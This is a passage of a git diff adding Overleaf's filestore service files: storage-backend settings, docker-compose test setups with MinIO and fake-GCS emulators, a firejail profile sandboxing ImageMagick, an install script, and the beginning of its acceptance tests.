+--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add=ENABLE_CONVERSIONS="true",USE_PROM_METRICS="true",AWS_S3_USER_FILES_STORAGE_CLASS=REDUCED_REDUNDANCY,AWS_S3_USER_FILES_BUCKET_NAME=fake-user-files,AWS_S3_USER_FILES_DEK_BUCKET_NAME=fake-user-files-dek,AWS_S3_TEMPLATE_FILES_BUCKET_NAME=fake-template-files,GCS_USER_FILES_BUCKET_NAME=fake-gcs-user-files,GCS_TEMPLATE_FILES_BUCKET_NAME=fake-gcs-template-files +--env-pass-through= +--esmock-loader=False +--node-version=20.18.2 +--public-repo=True +--script-version=4.7.0 +--test-acceptance-shards=SHARD_01_,SHARD_02_,SHARD_03_ +--use-large-ci-runner=True diff --git a/services/filestore/config/settings.defaults.js b/services/filestore/config/settings.defaults.js new file mode 100644 index 0000000..9a08bb1 --- /dev/null +++ b/services/filestore/config/settings.defaults.js @@ -0,0 +1,120 @@ +const Path = require('node:path') + +// environment variables renamed for consistency +// use AWS_ACCESS_KEY_ID-style going forward +if (process.env.AWS_KEY && !process.env.AWS_ACCESS_KEY_ID) { + process.env.AWS_ACCESS_KEY_ID = process.env.AWS_KEY +} +if (process.env.AWS_SECRET && !process.env.AWS_SECRET_ACCESS_KEY) { + process.env.AWS_SECRET_ACCESS_KEY = process.env.AWS_SECRET +} + +// pre-backend setting, fall back to old behaviour +if (process.env.BACKEND == null) { + if (process.env.AWS_ACCESS_KEY_ID || process.env.S3_BUCKET_CREDENTIALS) { + process.env.BACKEND = 's3' + process.env.USER_FILES_BUCKET_NAME = + process.env.AWS_S3_USER_FILES_BUCKET_NAME + process.env.TEMPLATE_FILES_BUCKET_NAME = + process.env.AWS_S3_TEMPLATE_FILES_BUCKET_NAME + } else { + process.env.BACKEND = 'fs' + process.env.USER_FILES_BUCKET_NAME = Path.join(__dirname, '../user_files') + process.env.TEMPLATE_FILES_BUCKET_NAME = Path.join( + __dirname, + '../template_files' + ) + } +} + +const settings = { + internal: { + filestore: { + port: 3009, + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + }, + }, + + filestore: { + // Which backend persistor to use. + // Choices are + // s3 - Amazon S3 + // fs - local filesystem + // gcs - Google Cloud Storage + backend: process.env.BACKEND, + + gcs: { + endpoint: process.env.GCS_API_ENDPOINT + ? { + apiEndpoint: process.env.GCS_API_ENDPOINT, + projectId: process.env.GCS_PROJECT_ID, + } + : undefined, + unlockBeforeDelete: process.env.GCS_UNLOCK_BEFORE_DELETE === 'true', // unlock an event-based hold before deleting. default false + deletedBucketSuffix: process.env.GCS_DELETED_BUCKET_SUFFIX, // if present, copy file to another bucket on delete. default null + deleteConcurrency: parseInt(process.env.GCS_DELETE_CONCURRENCY) || 50, + signedUrlExpiryInMs: parseInt(process.env.LINK_EXPIRY_TIMEOUT || 60000), + }, + + s3: { + key: process.env.AWS_ACCESS_KEY_ID, + secret: process.env.AWS_SECRET_ACCESS_KEY, + endpoint: process.env.AWS_S3_ENDPOINT, + pathStyle: process.env.AWS_S3_PATH_STYLE, + partSize: process.env.AWS_S3_PARTSIZE || 100 * 1024 * 1024, + bucketCreds: process.env.S3_BUCKET_CREDENTIALS + ? JSON.parse(process.env.S3_BUCKET_CREDENTIALS) + : undefined, + }, + + // GCS should be configured by the service account on the kubernetes pod. See GOOGLE_APPLICATION_CREDENTIALS, + // which will be picked up automatically. + + stores: { + user_files: process.env.USER_FILES_BUCKET_NAME, + template_files: process.env.TEMPLATE_FILES_BUCKET_NAME, + + // allow signed links to be generated for these buckets + project_blobs: process.env.OVERLEAF_EDITOR_PROJECT_BLOBS_BUCKET, + global_blobs: process.env.OVERLEAF_EDITOR_BLOBS_BUCKET, + }, + + fallback: process.env.FALLBACK_BACKEND + ? { + backend: process.env.FALLBACK_BACKEND, + // mapping of bucket names on the fallback, to bucket names on the primary. + // e.g. { myS3UserFilesBucketName: 'myGoogleUserFilesBucketName' } + buckets: JSON.parse(process.env.FALLBACK_BUCKET_MAPPING || '{}'), + copyOnMiss: process.env.COPY_ON_MISS === 'true', + } + : undefined, + + allowRedirects: process.env.ALLOW_REDIRECTS === 'true', + }, + + path: { + uploadFolder: Path.join(__dirname, '../uploads'), + }, + + commands: { + // Any commands to wrap the convert utility in, for example ["nice"], or ["firejail", "--profile=/etc/firejail/convert.profile"] + convertCommandPrefix: [], + }, + + enableConversions: process.env.ENABLE_CONVERSIONS === 'true', + + gracefulShutdownDelayInMs: + parseInt(process.env.GRACEFUL_SHUTDOWN_DELAY_SECONDS ?? '30', 10) * 1000, +} + +// Filestore health check +// ---------------------- +// Project and file details to check in persistor when calling /health_check +if (process.env.HEALTH_CHECK_PROJECT_ID && process.env.HEALTH_CHECK_FILE_ID) { + settings.health_check = { + project_id: process.env.HEALTH_CHECK_PROJECT_ID, + file_id: process.env.HEALTH_CHECK_FILE_ID, + } +} + +module.exports = settings diff --git a/services/filestore/docker-compose.ci.yml b/services/filestore/docker-compose.ci.yml new file mode 100644 index 0000000..febd6e4 --- /dev/null +++ b/services/filestore/docker-compose.ci.yml @@ -0,0 +1,203 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + AWS_S3_ENDPOINT: https://minio:9000 + AWS_S3_PATH_STYLE: 'true' + AWS_ACCESS_KEY_ID: OVERLEAF_FILESTORE_S3_ACCESS_KEY_ID + AWS_SECRET_ACCESS_KEY: OVERLEAF_FILESTORE_S3_SECRET_ACCESS_KEY + MINIO_ROOT_USER: MINIO_ROOT_USER + MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD + GCS_API_ENDPOINT: http://gcs:9090 + GCS_PROJECT_ID: fake + STORAGE_EMULATOR_HOST: http://gcs:9090/storage/v1 + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + ENABLE_CONVERSIONS: "true" + USE_PROM_METRICS: "true" + AWS_S3_USER_FILES_STORAGE_CLASS: REDUCED_REDUNDANCY + AWS_S3_USER_FILES_BUCKET_NAME: fake-user-files + AWS_S3_USER_FILES_DEK_BUCKET_NAME: fake-user-files-dek + AWS_S3_TEMPLATE_FILES_BUCKET_NAME: fake-template-files + GCS_USER_FILES_BUCKET_NAME: fake-gcs-user-files + GCS_TEMPLATE_FILES_BUCKET_NAME: fake-gcs-template-files + volumes: + - ./test/acceptance/certs:/certs + depends_on: + certs: + condition: service_completed_successfully + minio: + condition: service_started + minio_setup: + condition: service_completed_successfully + gcs: + condition: service_healthy + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root + certs: + image: node:20.18.2 + volumes: + - ./test/acceptance/certs:/certs + working_dir: /certs + entrypoint: sh + command: + - '-cex' + - | + if [ ! -f ./certgen ]; then + wget -O ./certgen "https://github.com/minio/certgen/releases/download/v1.3.0/certgen-linux-$(dpkg --print-architecture)" + chmod +x ./certgen + fi + if [ ! -f private.key ] || [ ! -f public.crt ]; then + ./certgen -host minio + fi + + minio: + image: minio/minio:RELEASE.2024-10-13T13-34-11Z + command: server /data + volumes: + - ./test/acceptance/certs:/root/.minio/certs + environment: + MINIO_ROOT_USER: MINIO_ROOT_USER + MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD + depends_on: + certs: + condition: service_completed_successfully + + minio_setup: + depends_on: + certs: + condition: service_completed_successfully + minio: + condition: service_started + image: minio/mc:RELEASE.2024-10-08T09-37-26Z + volumes: + - ./test/acceptance/certs:/root/.mc/certs/CAs + entrypoint: sh + command: + - '-cex' + - | + sleep 1 + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD + mc mb --ignore-existing s3/fake-user-files + mc mb --ignore-existing s3/fake-user-files-dek + mc mb --ignore-existing s3/fake-template-files + mc admin user add s3 \ + OVERLEAF_FILESTORE_S3_ACCESS_KEY_ID \ + OVERLEAF_FILESTORE_S3_SECRET_ACCESS_KEY + + echo ' + { + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::fake-user-files" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::fake-user-files/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::fake-user-files-dek" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::fake-user-files-dek/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::fake-template-files" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::fake-template-files/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::random-bucket-*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::random-bucket-*" + } + ] + }' > policy-filestore.json + + mc admin policy create s3 overleaf-filestore policy-filestore.json + mc admin policy attach s3 overleaf-filestore \ + --user=OVERLEAF_FILESTORE_S3_ACCESS_KEY_ID + gcs: + image: fsouza/fake-gcs-server:1.45.2 + command: ["--port=9090", "--scheme=http"] + healthcheck: + test: wget --quiet --output-document=/dev/null http://localhost:9090/storage/v1/b + interval: 1s + retries: 20 diff --git a/services/filestore/docker-compose.yml b/services/filestore/docker-compose.yml new file mode 100644 index 0000000..cc58997 --- /dev/null +++ b/services/filestore/docker-compose.yml @@ -0,0 +1,211 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + build: + context: ../.. + dockerfile: services/filestore/Dockerfile + target: base + volumes: + - .:/overleaf/services/filestore + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/filestore + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + build: + context: ../.. + dockerfile: services/filestore/Dockerfile + target: base + volumes: + - .:/overleaf/services/filestore + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + - ./test/acceptance/certs:/certs + working_dir: /overleaf/services/filestore + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + AWS_S3_ENDPOINT: https://minio:9000 + AWS_S3_PATH_STYLE: 'true' + AWS_ACCESS_KEY_ID: OVERLEAF_FILESTORE_S3_ACCESS_KEY_ID + AWS_SECRET_ACCESS_KEY: OVERLEAF_FILESTORE_S3_SECRET_ACCESS_KEY + MINIO_ROOT_USER: MINIO_ROOT_USER + MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD + GCS_API_ENDPOINT: http://gcs:9090 + GCS_PROJECT_ID: fake + STORAGE_EMULATOR_HOST: http://gcs:9090/storage/v1 + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + ENABLE_CONVERSIONS: "true" + USE_PROM_METRICS: "true" + AWS_S3_USER_FILES_STORAGE_CLASS: REDUCED_REDUNDANCY + AWS_S3_USER_FILES_BUCKET_NAME: fake-user-files + AWS_S3_USER_FILES_DEK_BUCKET_NAME: fake-user-files-dek + AWS_S3_TEMPLATE_FILES_BUCKET_NAME: fake-template-files + GCS_USER_FILES_BUCKET_NAME: fake-gcs-user-files + GCS_TEMPLATE_FILES_BUCKET_NAME: fake-gcs-template-files + user: node + depends_on: + certs: + condition: service_completed_successfully + minio: + condition: service_started + minio_setup: + condition: service_completed_successfully + gcs: + condition: service_healthy + command: npm run --silent test:acceptance + + certs: + image: node:20.18.2 + volumes: + - ./test/acceptance/certs:/certs + working_dir: /certs + entrypoint: sh + command: + - '-cex' + - | + if [ ! -f ./certgen ]; then + wget -O ./certgen "https://github.com/minio/certgen/releases/download/v1.3.0/certgen-linux-$(dpkg --print-architecture)" + chmod +x ./certgen + fi + if [ ! -f private.key ] || [ ! -f public.crt ]; then + ./certgen -host minio + fi + + minio: + image: minio/minio:RELEASE.2024-10-13T13-34-11Z + command: server /data + volumes: + - ./test/acceptance/certs:/root/.minio/certs + environment: + MINIO_ROOT_USER: MINIO_ROOT_USER + MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD + depends_on: + certs: + condition: service_completed_successfully + + minio_setup: + depends_on: + certs: + condition: service_completed_successfully + minio: + condition: service_started + image: minio/mc:RELEASE.2024-10-08T09-37-26Z + volumes: + - ./test/acceptance/certs:/root/.mc/certs/CAs + entrypoint: sh + command: + - '-cex' + - | + sleep 1 + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD + mc mb --ignore-existing s3/fake-user-files + mc mb --ignore-existing s3/fake-user-files-dek + mc mb --ignore-existing s3/fake-template-files + mc admin user add s3 \ + OVERLEAF_FILESTORE_S3_ACCESS_KEY_ID \ + OVERLEAF_FILESTORE_S3_SECRET_ACCESS_KEY + + echo ' + { + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::fake-user-files" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::fake-user-files/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::fake-user-files-dek" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::fake-user-files-dek/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::fake-template-files" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::fake-template-files/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::random-bucket-*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::random-bucket-*" + } + ] + }' > policy-filestore.json + + mc admin policy create s3 overleaf-filestore policy-filestore.json + mc admin policy attach s3 overleaf-filestore \ + --user=OVERLEAF_FILESTORE_S3_ACCESS_KEY_ID + gcs: + image: fsouza/fake-gcs-server:1.45.2 + command: ["--port=9090", "--scheme=http"] + healthcheck: + test: wget --quiet --output-document=/dev/null http://localhost:9090/storage/v1/b + interval: 1s + retries: 20 diff --git a/services/filestore/firejail/convert.profile b/services/filestore/firejail/convert.profile new file mode 100644 index 0000000..38cc1a2 --- /dev/null +++ b/services/filestore/firejail/convert.profile @@ -0,0 +1,40 @@ +# Convert (ImageMagick profile) + +include /etc/firejail/disable-common.inc +include /etc/firejail/disable-devel.inc +# include /etc/firejail/disable-mgmt.inc ## removed in firejail 0.9.40 +# include /etc/firejail/disable-secret.inc ## removed in firejail 0.9.40 + +read-only /bin +blacklist /boot +blacklist /dev +read-only /etc +read-only /home +read-only /lib +read-only /lib64 +blacklist /media +blacklist /mnt +blacklist /opt +blacklist /root +read-only /run +blacklist /sbin +blacklist /selinux +blacklist /src +blacklist /sys +read-only /usr +blacklist /var + +caps.drop all +noroot +nogroups +protocol unix +net none +private-tmp +private-dev +shell none + +seccomp.keep accept,accept4,access,alarm,arch_prctl,bind,brk,capget,capset,chdir,chmod,chown,chroot,clock_getres,clock_gettime,clock_nanosleep,clone,close,connect,creat,dup,dup2,dup3,epoll_create,epoll_create1,epoll_ctl,epoll_ctl_old,epoll_pwait,epoll_wait,epoll_wait_old,eventfd,eventfd2,execve,execveat,exit,exit_group,faccessat,fadvise64,fallocate,fanotify_init,fanotify_mark,fchdir,fchmod,fchmodat,fchown,fchownat,fcntl,fdatasync,fgetxattr,flistxattr,flock,fork,fremovexattr,fsetxattr,fstat,fstatfs,fsync,ftruncate,futex,futimesat,get_robust_list,get_thread_area,getcpu,getcwd,getdents,getdents64,getegid,geteuid,getgid,getgroups,getitimer,getpeername,getpgid,getpgrp,getpid,getppid,getpriority,getrandom,getresgid,getresuid,getrlimit,getrusage,getsid,getsockname,getsockopt,gettid,gettimeofday,getuid,getxattr,inotify_add_watch,inotify_init,inotify_init1,inotify_rm_watch,io_cancel,io_destroy,io_getevents,io_setup,io_submit,ioctl,ioprio_get,ioprio_set,kill,lchown,lgetxattr,link,linkat,listen,listxattr,llistxattr,lremovexattr,lseek,lsetxattr,lstat,madvise,memfd_create,mincore,mkdir,mkdirat,mknod,mknodat,mlock,mlockall,mmap,modify_ldt,mprotect,mq_getsetattr,mq_notify,mq_open,mq_timedreceive,mq_timedsend,mq_unlink,mremap,msgctl,msgget,msgrcv,msgsnd,msync,munlock,munlockall,munmap,nanosleep,newfstatat,open,openat,pause,personality,pipe,pipe2,poll,ppoll,prctl,pread64,preadv,prlimit64,pselect6,pwrite64,pwritev,read,readahead,readlink,readlinkat,readv,recvfrom,recvmmsg,recvmsg,remap_file_pages,removexattr,rename,renameat,renameat2,restart_syscall,rmdir,rt_sigaction,rt_sigpending,rt_sigprocmask,rt_sigqueueinfo,rt_sigreturn,rt_sigsuspend,rt_sigtimedwait,rt_tgsigqueueinfo,sched_get_priority_max,sched_get_priority_min,sched_getaffinity,sched_getattr,sched_getparam,sched_getscheduler,sched_rr_get_interval,sched_setaffinity,sched_setattr,sched_setparam,sched_setscheduler,sched_yield,seccomp,select,semctl,semget,semop,semtimedop,sendfile,sendmmsg,sendmsg,sendto,set_robust_list,set_thread_area,set_tid_address,setdomainname,setfsgid,setfsuid,setgid,setgroups,sethostname,setitimer,setpgid,setpriority,setregid,setresgid,setresuid,setreuid,setrlimit,setsid,setsockopt,setuid,setxattr,shmat,shmctl,shmdt,shmget,shutdown,sigaltstack,signalfd,signalfd4,socket,socketpair,splice,stat,statfs,symlink,symlinkat,sync,sync_file_range,syncfs,sysinfo,syslog,tee,tgkill,time,timer_create,timer_delete,timer_getoverrun,timer_gettime,timer_settime,timerfd_create,timerfd_gettime,timerfd_settime,times,tkill,truncate,umask,uname,unlink,unlinkat,utime,utimensat,utimes,vfork,vhangup,vmsplice,wait4,waitid,write,writev,unshare + +rlimit-fsize 524288000 #500Mb +rlimit-nproc 600 #if too low this can cause error: Error fork:sandbox(774): Resource temporarily unavailable +rlimit-nofile 100 \ No newline at end of file diff --git a/services/filestore/install_deps.sh b/services/filestore/install_deps.sh new file mode 100755 index 0000000..1335e9f --- /dev/null +++ b/services/filestore/install_deps.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +set -ex + +apt-get update + +apt-get install ghostscript imagemagick optipng iproute2 --yes + +rm -rf /var/lib/apt/lists/* + +# Allow ImageMagick to process PDF files. Filestore does pdf to image +# conversion for the templates service. +patch /etc/ImageMagick-6/policy.xml <<EOF +--- old.xml 2022-03-23 09:16:03.985433900 -0400 ++++ new.xml 2022-03-23 09:16:18.625471992 -0400 +@@ -91,6 +91,5 @@ + <policy domain="coder" rights="none" pattern="PS2" /> + <policy domain="coder" rights="none" pattern="PS3" /> + <policy domain="coder" rights="none" pattern="EPS" /> +- <policy domain="coder" rights="none" pattern="PDF" /> + <policy domain="coder" rights="none" pattern="XPS" /> + </policymap> +EOF diff --git a/services/filestore/package.json b/services/filestore/package.json new file mode 100644 index 0000000..4b9043a --- /dev/null +++ b/services/filestore/package.json @@ -0,0 +1,49 @@ +{ + "name": "@overleaf/filestore", + "description": "An API for CRUD operations on binary files stored in S3", + "private": true, + "main": "app.js", + "scripts": { + "test:acceptance:run": "mocha --recursive --reporter spec --timeout 15000 $@ test/acceptance/js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit:run": "mocha --recursive --reporter spec $@ test/unit/js", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "start": "node app.js", + "nodemon": "node --watch app.js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/object-persistor": "*", + "@overleaf/settings": "*", + "@overleaf/stream-utils": "^0.1.0", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "glob": "^7.1.6", + "lodash.once": "^4.1.1", + "node-fetch": "^2.7.0", + "range-parser": "^1.2.1", + "tiny-async-pool": "^1.1.0" + }, + "devDependencies": { + "@google-cloud/storage": "^6.10.1", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "mongodb": "6.12.0", + "sandboxed-module": "2.0.4", + "sinon": "9.0.2", + "sinon-chai": "^3.7.0", + "streamifier": "^0.1.1", + "typescript": "^5.0.4" + } +} diff --git a/services/filestore/test/acceptance/certs/.gitignore b/services/filestore/test/acceptance/certs/.gitignore new file mode 100644 index 0000000..d6b7ef3 --- /dev/null +++ b/services/filestore/test/acceptance/certs/.gitignore @@ -0,0 +1,2 @@ +* +!.gitignore diff --git a/services/filestore/test/acceptance/deps/Dockerfile.fake-gcs b/services/filestore/test/acceptance/deps/Dockerfile.fake-gcs new file mode 100644 index 0000000..d39a293 --- /dev/null +++ b/services/filestore/test/acceptance/deps/Dockerfile.fake-gcs @@ -0,0 +1,5 @@ +FROM fsouza/fake-gcs-server:1.20 +RUN apk add --update --no-cache curl +COPY healthcheck.sh /healthcheck.sh +HEALTHCHECK --interval=1s --timeout=1s --retries=30 CMD /healthcheck.sh http://127.0.0.1:9090 +CMD ["--port=9090", "--scheme=http"] diff --git a/services/filestore/test/acceptance/deps/Dockerfile.s3mock b/services/filestore/test/acceptance/deps/Dockerfile.s3mock new file mode 100644 index 0000000..8b033fa --- /dev/null +++ b/services/filestore/test/acceptance/deps/Dockerfile.s3mock @@ -0,0 +1,4 @@ +FROM adobe/s3mock:2.4.14 +RUN apk add --update --no-cache curl +COPY healthcheck.sh /healthcheck.sh +HEALTHCHECK --interval=1s --timeout=1s --retries=30 CMD /healthcheck.sh http://127.0.0.1:9090 diff --git a/services/filestore/test/acceptance/deps/healthcheck.sh b/services/filestore/test/acceptance/deps/healthcheck.sh new file mode 100755 index 0000000..675c205 --- /dev/null +++ b/services/filestore/test/acceptance/deps/healthcheck.sh @@ -0,0 +1,9 @@ +#!/bin/sh + +# health check to allow 404 status code as valid +STATUSCODE=$(curl --silent --output /dev/null --write-out "%{http_code}" "$1") +# will be 000 on non-http error (e.g. connection failure) +if test "$STATUSCODE" -ge 500 || test "$STATUSCODE" -lt 200; then + exit 1 +fi +exit 0 diff --git a/services/filestore/test/acceptance/js/FilestoreApp.js b/services/filestore/test/acceptance/js/FilestoreApp.js new file mode 100644 index 0000000..61e9a29 --- /dev/null +++ b/services/filestore/test/acceptance/js/FilestoreApp.js @@ -0,0 +1,42 @@ +const ObjectPersistor = require('@overleaf/object-persistor') +const Settings = require('@overleaf/settings') +const { promisify } = require('node:util') +const App = require('../../../app') +const FileHandler = require('../../../app/js/FileHandler') + +class FilestoreApp { + async runServer() { + if (!this.server) { + await new Promise((resolve, reject) => { + this.server = App.listen( + Settings.internal.filestore.port, + '127.0.0.1', + err => { + if (err) { + return reject(err) + } + resolve() + } + ) + }) + } + + this.persistor = ObjectPersistor({ + ...Settings.filestore, + paths: Settings.path, + }) + FileHandler._TESTONLYSwapPersistorManager(this.persistor) + } + + async stop() { + if (!this.server) return + const closeServer = promisify(this.server.close).bind(this.server) + try { + await closeServer() + } finally { + delete this.server + } + } +} + +module.exports = FilestoreApp diff --git a/services/filestore/test/acceptance/js/FilestoreTests.js b/services/filestore/test/acceptance/js/FilestoreTests.js new file mode 100644 index 0000000..28f90d4 --- /dev/null +++ b/services/filestore/test/acceptance/js/FilestoreTests.js @@ -0,0 +1,1564 @@ +const chai = require('chai') +const { expect } = chai +const fs = require('node:fs') +const Stream = require('node:stream') +const Settings = require('@overleaf/settings') +const Path = require('node:path') +const FilestoreApp = require('./FilestoreApp') +const TestHelper = require('./TestHelper') +const fetch = require('node-fetch') +const { promisify } = require('node:util') +const { Storage } = require('@google-cloud/storage') +const streamifier = require('streamifier') +chai.use(require('chai-as-promised')) +const { ObjectId } = require('mongodb') +const ChildProcess = require('node:child_process') + +const fsWriteFile = promisify(fs.writeFile) +const fsStat = promisify(fs.stat) +const exec = promisify(ChildProcess.exec) +const msleep = promisify(setTimeout) + +if (!process.env.AWS_ACCESS_KEY_ID) { + throw new Error('please provide credentials for the AWS S3 test server') +} + +process.on('unhandledRejection', e => { + // eslint-disable-next-line no-console + console.log('** Unhandled Promise Rejection **\n', e) + throw e +}) + +// store settings for multiple backends, so that we can test each one. +// fs will always be available - add others if they are configured +const { + BackendSettings, + s3Config, + s3SSECConfig, + AWS_S3_USER_FILES_STORAGE_CLASS, +} = require('./TestConfig') +const { + AlreadyWrittenError, + NotFoundError, + NotImplementedError, + NoKEKMatchedError, +} = require('@overleaf/object-persistor/src/Errors') +const { + PerProjectEncryptedS3Persistor, + RootKeyEncryptionKey, +} = require('@overleaf/object-persistor/src/PerProjectEncryptedS3Persistor') +const { S3Persistor } = require('@overleaf/object-persistor/src/S3Persistor') +const crypto = require('node:crypto') +const { WritableBuffer } = require('@overleaf/stream-utils') +const { gzipSync } = require('node:zlib') + +describe('Filestore', function () { + this.timeout(1000 * 10) + const filestoreUrl = `http://127.0.0.1:${Settings.internal.filestore.port}` + + const seenSockets = [] + async function expectNoSockets() { + try { + await msleep(1000) + const { stdout } = await exec('ss -tn') + const lines = stdout.split('\n') + const header = lines.shift() + + const badSockets = [] + for (const socket of lines) { + const fields = socket.split(' ').filter(part => part !== '') + if ( + fields.length > 2 && + parseInt(fields[1]) && + !seenSockets.includes(socket) + ) { + badSockets.push(socket) + seenSockets.push(socket) + } + } + + if (badSockets.length) { + // eslint-disable-next-line no-console + console.error( + 'ERR: Sockets still have receive buffer after connection closed' + ) + console.error(header) + for (const socket of badSockets) { + // eslint-disable-next-line no-console + console.error(socket) + } + throw new Error('Sockets still open after connection closed') + } + } catch (err) { + expect(err).not.to.exist + } + } + + // redefine the test suite for every available backend + for (const [backendVariantWithShardNumber, backendSettings] of Object.entries( + BackendSettings + )) { + describe(backendVariantWithShardNumber, function () { + let app, + previousEgress, + previousIngress, + metricPrefix, + projectId, + otherProjectId + + const dataEncryptionKeySize = + backendSettings.backend === 's3SSEC' ? 32 : 0 + + const BUCKET_NAMES = [ + process.env.GCS_USER_FILES_BUCKET_NAME, + process.env.GCS_TEMPLATE_FILES_BUCKET_NAME, + `${process.env.GCS_USER_FILES_BUCKET_NAME}-deleted`, + `${process.env.GCS_TEMPLATE_FILES_BUCKET_NAME}-deleted`, + ] + + before('start filestore with new settings', async function () { + // create the app with the relevant filestore settings + Settings.filestore = backendSettings + app = new FilestoreApp() + await app.runServer() + }) + + if (backendSettings.gcs) { + before('create gcs buckets', async function () { + // create test buckets for gcs + const storage = new Storage(Settings.filestore.gcs.endpoint) + for (const bucketName of BUCKET_NAMES) { + await storage.createBucket(bucketName) + } + }) + + after('delete gcs buckets', async function () { + // tear down all the gcs buckets + const storage = new Storage(Settings.filestore.gcs.endpoint) + for (const bucketName of BUCKET_NAMES) { + const bucket = storage.bucket(bucketName) + await bucket.deleteFiles() + await bucket.delete() + } + }) + } + + after('stop filestore app', async function () { + await app.stop() + }) + + beforeEach('fetch previous egress metric', async function () { + // retrieve previous metrics from the app + if (['s3', 's3SSEC', 'gcs'].includes(Settings.filestore.backend)) { + metricPrefix = Settings.filestore.backend.replace('SSEC', '') + previousEgress = await TestHelper.getMetric( + filestoreUrl, 